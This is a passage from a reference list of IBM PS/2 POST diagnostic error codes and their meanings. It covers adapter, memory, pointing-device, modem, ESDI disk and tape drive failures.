  3104 RAM Failure
  3105 HIC Failure
  3106 +/- 12v Failed
  3107 Digital Loopback Failure
  3108 Host Detected HIC Failure
  3109 Synchronous Fail & No Go Bit
  3110 HIC Test OK & No Go Bit
  3111 Go Bit & No CMD 41
  3112 Card not present
  3113 Digital Failure ( Fall Through )
  3115 Analog Failure
  3141 Hot Carrier (not this card)
  3142 Hot Carrier (THIS CARD !!)

33xx   Compact Printer Errors

74xx   Display Adapter 8514/A

850x   80286 Expanded Memory Adapter/A

851x   80286 Expanded Memory Adapter/A

852x   Memory Module Package on the 8028
6 Expanded Memory Adapter/A

860x   PS/2 Pointing Device Errors
   8601   Pointing device (IBM mouse)
   8602   Pointing device
   8603   System board error
   8604   System board : Pointing device

100xx  Multiprotocol Adapter/A
   10002  Multiprotocol Adapter/A any serial device
   10006  Multiprotocol Adapter/A any serial device
   10007  Communications cable Multiprotocol Adapter/A
   10008  Multiprotocol Adapter/A any serial device
   10009  Multiprotocol Adapter/A any serial device

101xx Modem Adapter/A
   10102  Modem Adapter/A any serial device
   10106  Modem Adapter/A any serial device
   10108  Modem Adapter/A any serial device
   10109  Modem Adapter/A any serial device

104xx Fixed Disk Adapter (ESDI) Drives 0 or 1 (C or D)
   10480  Fixed disk C, adapter (ESDI) or system board error
   10481  Fixed disk D, adapter (ESDI) or system board error
   10482  Fixed disk C or system board error
   10483  Fixed disk adapter (ESDI) or system board error
   10490  Fixed disk C or adapter (ESDI) error
   10491  Fixed disk C or adapter (ESDI) error

16500  6157 Tape Attachment Adapter

16520  6157 Streaming Tape Drive

16540  6157 Streaming Tape Drive or tape attachment adapter